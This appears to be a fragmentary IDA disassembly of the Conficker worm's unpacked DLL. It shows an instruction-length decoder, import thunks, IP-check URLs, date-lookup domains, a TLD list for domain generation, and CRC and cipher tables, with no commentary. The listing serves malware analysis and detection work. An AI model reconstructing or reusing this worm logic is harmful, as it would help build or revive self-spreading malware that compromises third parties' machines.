xor edx, edx
mov esi, [esp+20h+arg_0]
mov ebp, esp
push 1097F71Ch
push 0F71C6780h
push 17389718h
push 101CB718h
push 17302C17h
push 18173017h
push 0F715F547h
push 4C103748h
push 272CE7F7h
push 0F7AC6087h
push 1C121C52h
push 7C10871Ch
push 201C701Ch
push 4767602Bh
push 20211011h
push 40121625h
push 82872022h
push 47201220h
push 13101419h
push 18271013h
push 28858260h
push 15124045h
push 5016A0C7h
push 28191812h
push 0F2401812h
push 19154127h
push 50F0F011h
mov ecx, 15124710h
push ecx
push 11151247h
push 10111512h
push 47101115h
mov eax, 12472015h
push eax
push eax
push 12471A10h
add cl, 10h
push ecx
sub cl, 20h
push ecx
xor ecx, ecx
dec ecx
loc_9B313D: ; CODE XREF: sub_9B3080+E0�j
inc ecx
mov edi, esp
loc_9B3140: ; CODE XREF: sub_9B3080+EA�j
lodsb
mov bh, al
loc_9B3143: ; CODE XREF: sub_9B3080+CB�j
mov ah, [edi]
inc edi
shr ah, 4
sub al, ah
jnb short loc_9B3143
mov al, [edi-1]
and al, 0Fh
cmp al, 0Ch
jnz short loc_9B3159
pop edx
not edx
loc_9B3159: ; CODE XREF: sub_9B3080+D4�j
inc edx
cmp al, 0
jz short loc_9B319F
cmp al, 1
jz short loc_9B313D
add edi, 51h
cmp al, 0Ah
jz short loc_9B3140
mov edi, [ebp+24h]
inc edx
cmp al, 2
jz short loc_9B319F
cmp al, 7
jz short loc_9B31A7
cmp al, 0Bh
jz short loc_9B31FA
loc_9B317C: ; CODE XREF: sub_9B3080+185�j
inc edx
cmp al, 3
jz short loc_9B319F
cmp al, 8
jz short loc_9B31A7
inc edx
cmp al, 4
jz short loc_9B319F
inc edx
inc edx
pusha
mov al, 66h
repne scasb
popa
jnz short loc_9B3196
loc_9B3194: ; CODE XREF: sub_9B3080+190�j
; sub_9B3080+1A8�j
dec edx
dec edx
loc_9B3196: ; CODE XREF: sub_9B3080+112�j
cmp al, 9
jz short loc_9B31A7
sub al, 5
jz short loc_9B320A
loc_9B319E: ; CODE XREF: sub_9B3080+16A�j
; sub_9B3080+16E�j ...
inc edx
loc_9B319F: ; CODE XREF: sub_9B3080+DC�j
; sub_9B3080+F2�j ...
mov esp, ebp
mov [esp+0ACh+var_90], edx
popa
retn
; ---------------------------------------------------------------------------
loc_9B31A7: ; CODE XREF: sub_9B3080+F6�j
; sub_9B3080+103�j ...
lodsb
mov ah, al
shr al, 7
jb short loc_9B31C1
jz short loc_9B31C5
add dl, 4
pusha
mov al, 67h
repne scasb
popa
jnz short loc_9B31C5
sub dl, 3
dec al
loc_9B31C1: ; CODE XREF: sub_9B3080+12D�j
jnz short loc_9B319F
inc edx
inc eax
loc_9B31C5: ; CODE XREF: sub_9B3080+12F�j
; sub_9B3080+13A�j
and ah, 7
pusha
mov al, 67h
repne scasb
popa
jz short loc_9B31E3
cmp ah, 4
jz short loc_9B31EC
cmp ah, 5
jnz short loc_9B319F
dec al
jz short loc_9B319F
loc_9B31DE: ; CODE XREF: sub_9B3080+178�j
add dl, 4
jmp short loc_9B319F
; ---------------------------------------------------------------------------
loc_9B31E3: ; CODE XREF: sub_9B3080+14E�j
cmp ax, 600h
jnz short loc_9B319F
inc edx
jmp short loc_9B319E
; ---------------------------------------------------------------------------
loc_9B31EC: ; CODE XREF: sub_9B3080+153�j
cmp al, 0
jnz short loc_9B319E
lodsb
and al, 7
sub al, 5
jnz short loc_9B319E
inc edx
jmp short loc_9B31DE
; ---------------------------------------------------------------------------
loc_9B31FA: ; CODE XREF: sub_9B3080+FA�j
test byte ptr [esi], 38h
jnz short loc_9B31A7
mov al, 8
shr bh, 1
adc al, 0
jmp loc_9B317C
; ---------------------------------------------------------------------------
loc_9B320A: ; CODE XREF: sub_9B3080+11C�j
sub bh, 0A0h
cmp bh, 4
jnb short loc_9B3194
pusha
mov al, 67h
repne scasb
popa
jnz short loc_9B321C
dec edx
dec edx
loc_9B321C: ; CODE XREF: sub_9B3080+198�j
pusha
mov al, 66h
repne scasb
popa
jz loc_9B319E
jnz loc_9B3194
sub_9B3080 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B322E proc near ; CODE XREF: sub_9A6810+7�p
; sub_9A6810+18�p ...
jmp dword_9A11E4
sub_9B322E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B3234 proc near ; DATA XREF: sub_9AC4A4+A�o
; __SEH_prolog�o
jmp dword_9A11C8
sub_9B3234 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B323A proc near ; CODE XREF: sub_9A7364+77�p
; sub_9A7364+90�p ...
jmp dword_9A11B8
sub_9B323A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B3240 proc near ; CODE XREF: sub_9A7454+2F�p
; sub_9A754B+58�p ...
jmp dword_9A11B4
sub_9B3240 endp
; ---------------------------------------------------------------------------
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B3324 proc near ; CODE XREF: sub_9A96EE+B8�p
jmp dword_9A1188
sub_9B3324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B332A proc near ; CODE XREF: sub_9A96EE+5F�p
jmp dword_9A1184
sub_9B332A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B3330 proc near ; CODE XREF: sub_9A991B+74�p
jmp dword_9A11E8
sub_9B3330 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B3336 proc near ; CODE XREF: sub_9A991B+A9�p
; sub_9AC843+BE�p ...
jmp dword_9A1180
sub_9B3336 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B333C proc near ; CODE XREF: sub_9A9E56+5B�p
; sub_9A9E56+74�p ...
jmp dword_9A117C
sub_9B333C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B3342 proc near ; CODE XREF: sub_9AC747+82�p
; sub_9AC747+B8�p ...
jmp dword_9A116C
sub_9B3342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B3348 proc near ; CODE XREF: sub_9AF64C+96�p
jmp dword_9A1158
sub_9B3348 endp
; [000000AB BYTES: COLLAPSED FUNCTION _CRT_INIT(x,x,x). PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION DllEntryPoint. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B3496 proc near ; CODE XREF: _CRT_INIT(x,x,x)+59�p
jmp dword_9A1138
sub_9B3496 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B349C proc near ; CODE XREF: sub_9A7C20+62�p
jmp dword_9A10B0
sub_9B349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34A2 proc near ; CODE XREF: sub_9A7C20+3C�p
jmp dword_9A10AC
sub_9B34A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34A8 proc near ; CODE XREF: sub_9A7C20+10�p
jmp dword_9A10A8
sub_9B34A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34AE proc near ; CODE XREF: sub_9A6847+1A5�p
jmp dword_9A1290
sub_9B34AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34B4 proc near ; CODE XREF: sub_9A71BA+B2�p
jmp dword_9A12B0
sub_9B34B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34BA proc near ; CODE XREF: sub_9A87A8+57�p
jmp dword_9A12A4
sub_9B34BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34C0 proc near ; CODE XREF: sub_9A8214+63�p
; sub_9A82E1+62�p ...
jmp dword_9A1250
sub_9B34C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34C6 proc near ; CODE XREF: sub_9A87A8+5E�p
jmp dword_9A1280
sub_9B34C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34CC proc near ; CODE XREF: sub_9AC417+12�p
; sub_9AC439+12�p
jmp dword_9A1204
sub_9B34CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34D2 proc near ; CODE XREF: sub_9A8471+27�p
; sub_9A9460+3B�p
jmp dword_9A12C8
sub_9B34D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34D8 proc near ; CODE XREF: sub_9AC693+50�p
jmp dword_9A12CC
sub_9B34D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34DE proc near ; CODE XREF: sub_9A7454+57�p
jmp dword_9A1128
sub_9B34DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34E4 proc near ; CODE XREF: sub_9A78CC+C4�p
jmp dword_9A112C
sub_9B34E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34EA proc near ; CODE XREF: sub_9AC5AF+9B�p
jmp dword_9A1220
sub_9B34EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34F0 proc near ; CODE XREF: sub_9AC5AF+84�p
jmp dword_9A1224
sub_9B34F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_9B34F6 proc near ; CODE XREF: sub_9AC5AF+5A�p
jmp dword_9A1228
sub_9B34F6 endp
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
dd 6AEh dup(0)
dword_9B5000 dd 0 dword_9B5004 dd 3 dup(0) off_9B5010 dd offset aHttpCheckip_dy ; DATA XREF: sub_9A728D+5C�r
; "http://checkip.dyndns.org"
dd offset aHttpGetmyip_co ; "http://getmyip.co.uk"
dd offset aHttpWww_getmyi ; "http://www.getmyip.org"
align 10h
dword_9B5020 dd 0 ; sub_9A7607:loc_9A7670�r
dword_9B5024 dd 9 ; sub_9A7607+71�r
dd 1F1CB0h, 3 dup(0)
dd 5, 9, 780E1FCBh, 3 dup(0)
dd 6, 9, 7C90568Ch, 7CA27CF4h, 7C86FED3h, 7C83E413h, 7
dd 9, 7C86BEB8h, 7CA1E84Eh, 7C86A01Bh, 7C83F517h, 2, 9
dd 7801CB24h, 3 dup(0)
dd 3, 9, 6F88F727h, 6F8916E2h, 2 dup(0)
dd 3, 1, 6FD8F727h, 6FD916E2h, 2 dup(0)
dd 3, 416h, 596FF727h, 597016E2h, 2 dup(0)
dd 3, 804h, 58FCDA43h, 58FC16E2h, 2 dup(0)
dd 3, 4, 586117CBh, 586116E2h, 2 dup(0)
dd 3, 5, 6FE1F727h, 6FE216E2h, 2 dup(0)
dd 3, 6, 5978F727h, 597916E2h, 2 dup(0)
dd 3, 13h, 596CF727h, 596D16E2h, 2 dup(0)
dd 3, 0Bh, 597DF727h, 597E16E2h, 2 dup(0)
dd 3, 0Ch, 595BF727h, 595C16E2h, 2 dup(0)
dd 3, 7, 6FDA2B0Fh, 6FDA16E2h, 2 dup(0)
dd 3, 8, 592AF727h, 592B16E2h, 2 dup(0)
dd 3, 0Eh, 5970F727h, 597116E2h, 2 dup(0)
dd 3, 0Dh, 5940F727h, 594116E2h, 2 dup(0)
dd 3, 10h, 596BF727h, 596C16E2h, 2 dup(0)
dd 3, 11h, 56801418h, 568016E2h, 2 dup(0)
dd 3, 12h, 6FD717CBh, 6FD716E2h, 2 dup(0)
dd 3, 14h, 597CF727h, 597D16E2h, 2 dup(0)
dd 3, 15h, 5941F727h, 594216E2h, 2 dup(0)
dd 3, 16h, 596BF727h, 596C16E2h, 2 dup(0)
dd 3, 19h, 6FE21418h, 6FE216E2h, 2 dup(0)
dd 3, 0Ah, 6FDBF727h, 6FDC16E2h, 2 dup(0)
dd 3, 1Dh, 597AF727h, 597B16E2h, 2 dup(0)
dd 3, 1Fh, 5A791418h, 5A7916E2h, 2 dup(0)
dword_9B52D8 dd 0C351h align 10h
dword_9B52E0 dd 617BF0CFh, 0E816D789h, 31ED091Bh, 0E72EFE45h, 56B9248Ah
; DATA XREF: sub_9A9312+36�o
dd 364173F6h, 5037EF78h, 0CA86ECDFh, 4B96E24Fh, 50F4E6C3h
dd 0E85616BAh, 5BF2764Eh, 98574572h, 970B077Ah, 0ABE91715h
dd 56136DF6h, 551A66DEh, 949EAEAEh, 2560EE53h, 0CB01FC34h
dd 0F41D66F7h, 6F1DE9B0h, 821BA9E9h, 6E5CA3C1h, 6561DAE3h
dd 6A36AB28h, 0EEE93EA5h, 0E23AC10Ah, 1EF64327h, 3C2A030Bh
dd 0E9FE919Bh, 25BF7640h
off_9B5360 dd offset aBaidu_com ; DATA XREF: sub_9A961F+25�r
; "baidu.com"
dd offset aGoogle_com ; "google.com"
dd offset aYahoo_com ; "yahoo.com"
dd offset aMsn_com ; "msn.com"
dd offset aAsk_com ; "ask.com"
dd offset aW3_org ; "w3.org"
off_9B5378 dd offset aJan ; DATA XREF: sub_9A953B+84�r
; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
off_9B53A8 dd offset a_com ; DATA XREF: sub_9A991B+A1�r
; ".com"
dd offset a_net ; ".net"
dd offset a_org ; ".org"
dd offset a_info ; ".info"
dd offset a_biz ; ".biz"
align 10h
dbl_9B53C0 db 56h, 48h, 85h, 56h, 77h, 0, 0, 0 ; DATA XREF: sub_9A961F+C1�w
; sub_9A96EE+C�r ...
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 9A1BB8h
off_9B53E0 dd offset off_9A39D8 ; DATA XREF: sub_9AC747+A6�r
word_9B53E4 dw 1 ; DATA XREF: sub_9AC747+C3�r
align 4
dd offset off_9A3A24
dd 416h, 9A3A2Ch, 804h, 9A3A34h, 4, 9A3A48h, 5, 9A3A50h
dd 6, 9A3A58h, 13h, 9A3A70h, 0Bh, 9A3A78h, 0Ch, 9A3AF8h
dd 7, 9A3B10h, 8, 9A3B1Ch, 0Eh, 9A3B34h, 0Dh, 9A3B24h
dd 10h, 9A3B3Ch, 11h, 9A3B44h, 12h, 9A3B50h, 14h, 9A3B60h
dd 15h, 9A3B68h, 16h, 9A3B88h, 19h, 9A3BB8h, 0Ah, 9A3C08h
dd 1Dh, 9A3C14h, 1Fh
dword_9B5498 dd 0 ; sub_9AD116:loc_9AD213�r ...
dword_9B549C dd 0 ; sub_9AD116+15�w
dd offset dword_9A5830
dd offset dword_9A56E0
dd 101h, 11Eh, 0Fh, 9A5CB0h, 9A5758h, 0
dd 1Eh, 0Fh, 0
dd offset dword_9A5768+68h
dd 0
dd 13h, 7, 0
dword_9B54E0 dd 0 ; sub_9ABD83+1B9�r ...
dword_9B54E4 dd 0C8h aCWindowsSystem db 'c:\windows\system32\conficker_unpacked.dll',0 ; DATA XREF: sub_9A6810+1�o
; sub_9A6847+29�o ...
dd 36h dup(0)
db 3 dup(0)
byte_9B55EB db 0 ; DATA XREF: sub_9A6847+F0�w
dword_9B55EC dd 0 ; sub_9A6847+128�r ...
dword_9B55F0 dd 0 ; sub_9ABD83+1AF�r ...
dword_9B55F4 dd 0 ; sub_9ABD83+275�r ...
dword_9B55F8 dd 0 ; sub_9A97BF+B�r ...
dword_9B55FC dd 7FFA0000h ; sub_9A7A90+6F�r ...
dword_9B5600 dd 0 ; sub_9A870B+4C�w
dword_9B5604 dd 0 ; sub_9A8A08+CD�r ...
dword_9B5608 dd 0 ; sub_9A8A08+1C5�w ...
dword_9B560C dd 0 ; sub_9A88D6+CD�o ...
dword_9B5610 dd 0 ; sub_9A991B+3C�w ...
dword_9B5614 dd 3 dup(0) ; sub_9ABD83+6B�o ...
dword_9B5620 dd 3 dup(0) ; sub_9AC1D7+52�o ...
dword_9B562C dd 0 ; sub_9A8A08+170�r ...
dword_9B5630 dd 0 ; sub_9AC0EF:loc_9AC162�w
align 8
dword_9B5638 dd 0 ; sub_9AC45B+3D�w ...
align 10h
dword_9B5640 dd 40h dup(0) ; sub_9AC53D+8�o ...
db 3 dup(0)
byte_9B5743 db 0 ; DATA XREF: sub_9AC843+ED�w
dword_9B5744 dd 0 ; sub_9AC843+11�r ...
dword_9B5748 dd 0 ; sub_9AC693+8C�o ...
align 10h
dword_9B5750 dd 40h dup(0) ; sub_9AC53D+65�o ...
db 3 dup(0)
byte_9B5853 db 0 ; DATA XREF: sub_9AC843+130�w
dword_9B5854 dd 0 ; sub_9AC693+98�w ...
dword_9B5858 dd 0 ; sub_9AD116+A2�r ...
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_9B5C58 dd 0 ; sub_9AD21E+86�r ...
dd 191B3141h, 32366282h, 2B2D53C3h, 646CC504h, 7D77F445h
dd 565AA786h, 4F4196C7h, 0C8D98A08h, 0D1C2BB49h, 0FAEFE88Ah
dd 0E3F4D9CBh, 0ACB54F0Ch, 0B5AE7E4Dh, 9E832D8Eh, 87981CCFh
dd 4AC21251h, 53D92310h, 78F470D3h, 61EF4192h, 2EAED755h
dd 37B5E614h, 1C98B5D7h, 5838496h, 821B9859h, 9B00A918h
dd 0B02DFADBh, 0A936CB9Ah, 0E6775D5Dh, 0FF6C6C1Ch, 0D4413FDFh
dd 0CD5A0E9Eh, 958424A2h, 8C9F15E3h, 0A7B24620h, 0BEA97761h
dd 0F1E8E1A6h, 0E8F3D0E7h, 0C3DE8324h, 0DAC5B265h, 5D5DAEAAh
dd 44469FEBh, 6F6BCC28h, 7670FD69h, 39316BAEh, 202A5AEFh
dd 0B07092Ch, 121C386Dh, 0DF4636F3h, 0C65D07B2h, 0ED705471h
dd 0F46B6530h, 0BB2AF3F7h, 0A231C2B6h, 891C9175h, 9007A034h
dd 179FBCFBh, 0E848DBAh, 25A9DE79h, 3CB2EF38h, 73F379FFh
dd 6AE848BEh, 41C51B7Dh, 58DE2A3Ch, 0F0794F05h, 0E9627E44h
dd 0C24F2D87h, 0DB541CC6h, 94158A01h, 8D0EBB40h, 0A623E883h
dd 0BF38D9C2h, 38A0C50Dh, 21BBF44Ch, 0A96A78Fh, 138D96CEh
dd 5CCC0009h, 45D73148h, 6EFA628Bh, 77E153CAh, 0BABB5D54h
dd 0A3A06C15h, 888D3FD6h, 91960E97h, 0DED79850h, 0C7CCA911h
dd 0ECE1FAD2h, 0F5FACB93h, 7262D75Ch, 6B79E61Dh, 4054B5DEh
dd 594F849Fh, 160E1258h, 0F152319h, 243870DAh, 3D23419Bh
dd 65FD6BA7h, 7CE65AE6h, 57CB0925h, 4ED03864h, 191AEA3h
dd 188A9FE2h, 33A7CC21h, 2ABCFD60h, 0AD24E1AFh, 0B43FD0EEh
dd 9F12832Dh, 8609B26Ch, 0C94824ABh, 0D05315EAh, 0FB7E4629h
dd 0E2657768h, 2F3F79F6h, 362448B7h, 1D091B74h, 4122A35h
dd 4B53BCF2h, 52488DB3h, 7965DE70h, 607EEF31h, 0E7E6F3FEh
dd 0FEFDC2BFh, 0D5D0917Ch, 0CCCBA03Dh, 838A36FAh, 9A9107BBh
dd 0B1BC5478h, 0A8A76539h, 3B83984Bh, 2298A90Ah, 9B5FAC9h
dd 10AECB88h, 5FEF5D4Fh, 46F46C0Eh, 6DD93FCDh, 74C20E8Ch
dd 0F35A1243h, 0EA412302h, 0C16C70C1h, 0D8774180h, 9736D747h
dd 8E2DE606h, 0A500B5C5h, 0BC1B8484h, 71418A1Ah, 685ABB5Bh
dd 4377E898h, 5A6CD9D9h, 152D4F1Eh, 0C367E5Fh, 271B2D9Ch
dd 3E001CDDh, 0B9980012h, 0A0833153h, 8BAE6290h, 92B553D1h
dd 0DDF4C516h, 0C4EFF457h, 0EFC2A794h, 0F6D996D5h, 0AE07BCE9h
dd 0B71C8DA8h, 9C31DE6Bh, 852AEF2Ah, 0CA6B79EDh, 0D37048ACh
dd 0F85D1B6Fh, 0E1462A2Eh, 66DE36E1h, 7FC507A0h, 54E85463h
dd 4DF36522h, 2B2F3E5h, 1BA9C2A4h, 30849167h, 299FA026h
dd 0E4C5AEB8h, 0FDDE9FF9h, 0D6F3CC3Ah, 0CFE8FD7Bh, 80A96BBCh
dd 99B25AFDh, 0B29F093Eh, 0AB84387Fh, 2C1C24B0h, 350715F1h
dd 1E2A4632h, 7317773h, 4870E1B4h, 516BD0F5h, 7A468336h
dd 635DB277h, 0CBFAD74Eh, 0D2E1E60Fh, 0F9CCB5CCh, 0E0D7848Dh
dd 0AF96124Ah, 0B68D230Bh, 9DA070C8h, 84BB4189h, 3235D46h
dd 1A386C07h, 31153FC4h, 280E0E85h, 674F9842h, 7E54A903h
dd 5579FAC0h, 4C62CB81h, 8138C51Fh, 9823F45Eh, 0B30EA79Dh
dd 0AA1596DCh, 0E554001Bh, 0FC4F315Ah, 0D7626299h, 0CE7953D8h
dd 49E14F17h, 50FA7E56h, 7BD72D95h, 62CC1CD4h, 2D8D8A13h
dd 3496BB52h, 1FBBE891h, 6A0D9D0h, 5E7EF3ECh, 4765C2ADh
dd 6C48916Eh, 7553A02Fh, 3A1236E8h, 230907A9h, 824546Ah
dd 113F652Bh, 96A779E4h, 8FBC48A5h, 0A4911B66h, 0BD8A2A27h
dd 0F2CBBCE0h, 0EBD08DA1h, 0C0FDDE62h, 0D9E6EF23h, 14BCE1BDh
dd 0DA7D0FCh, 268A833Fh, 3F91B27Eh, 70D024B9h, 69CB15F8h
dd 42E6463Bh, 5BFD777Ah, 0DC656BB5h, 0C57E5AF4h, 0EE530937h
dd 0F7483876h, 0B809AEB1h, 0A1129FF0h, 8A3FCC33h, 9324FD72h
dword_9B6058 dd 0 ; sub_9AD21E+90�r ...
dd 1C26A37h, 384D46Eh, 246BE59h, 709A8DCh, 6CBC2EBh, 48D7CB2h
dd 54F1685h, 0E1351B8h, 0FD13B8Fh, 0D9785D6h, 0C55EFE1h
dd 91AF964h, 8D89353h, 0A9E2D0Ah, 0B5C473Dh, 1C26A370h
dd 1DE4C947h, 1FA2771Eh, 1E601D29h, 1B2F0BACh, 1AED619Bh
dd 18ABDFC2h, 1969B5F5h, 1235F2C8h, 13F798FFh, 11B126A6h
dd 10734C91h, 153C5A14h, 14FE3023h, 16B88E7Ah, 177AE44Dh
dd 384D46E0h, 398F2CD7h, 3BC9928Eh, 3A0BF8B9h, 3F44EE3Ch
dd 3E86840Bh, 3CC03A52h, 3D025065h, 365E1758h, 379C7D6Fh
dd 35DAC336h, 3418A901h, 3157BF84h, 3095D5B3h, 32D36BEAh
dd 331101DDh, 246BE590h, 25A98FA7h, 27EF31FEh, 262D5BC9h
dd 23624D4Ch, 22A0277Bh, 20E69922h, 2124F315h, 2A78B428h
dd 2BBADE1Fh, 29FC6046h, 283E0A71h, 2D711CF4h, 2CB376C3h
dd 2EF5C89Ah, 2F37A2ADh, 709A8DC0h, 7158E7F7h, 731E59AEh
dd 72DC3399h, 7793251Ch, 76514F2Bh, 7417F172h, 75D59B45h
dd 7E89DC78h, 7F4BB64Fh, 7D0D0816h, 7CCF6221h, 798074A4h
dd 78421E93h, 7A04A0CAh, 7BC6CAFDh, 6CBC2EB0h, 6D7E4487h
dd 6F38FADEh, 6EFA90E9h, 6BB5866Ch, 6A77EC5Bh, 68315202h
dd 69F33835h, 62AF7F08h, 636D153Fh, 612BAB66h, 60E9C151h
dd 65A6D7D4h, 6464BDE3h, 662203BAh, 67E0698Dh, 48D7CB20h
dd 4915A117h, 4B531F4Eh, 4A917579h, 4FDE63FCh, 4E1C09CBh
dd 4C5AB792h, 4D98DDA5h, 46C49A98h, 4706F0AFh, 45404EF6h
dd 448224C1h, 41CD3244h, 400F5873h, 4249E62Ah, 438B8C1Dh
dd 54F16850h, 55330267h, 5775BC3Eh, 56B7D609h, 53F8C08Ch
dd 523AAABBh, 507C14E2h, 51BE7ED5h, 5AE239E8h, 5B2053DFh
dd 5966ED86h, 58A487B1h, 5DEB9134h, 5C29FB03h, 5E6F455Ah
dd 5FAD2F6Dh, 0E1351B80h, 0E0F771B7h, 0E2B1CFEEh, 0E373A5D9h
dd 0E63CB35Ch, 0E7FED96Bh, 0E5B86732h, 0E47A0D05h, 0EF264A38h
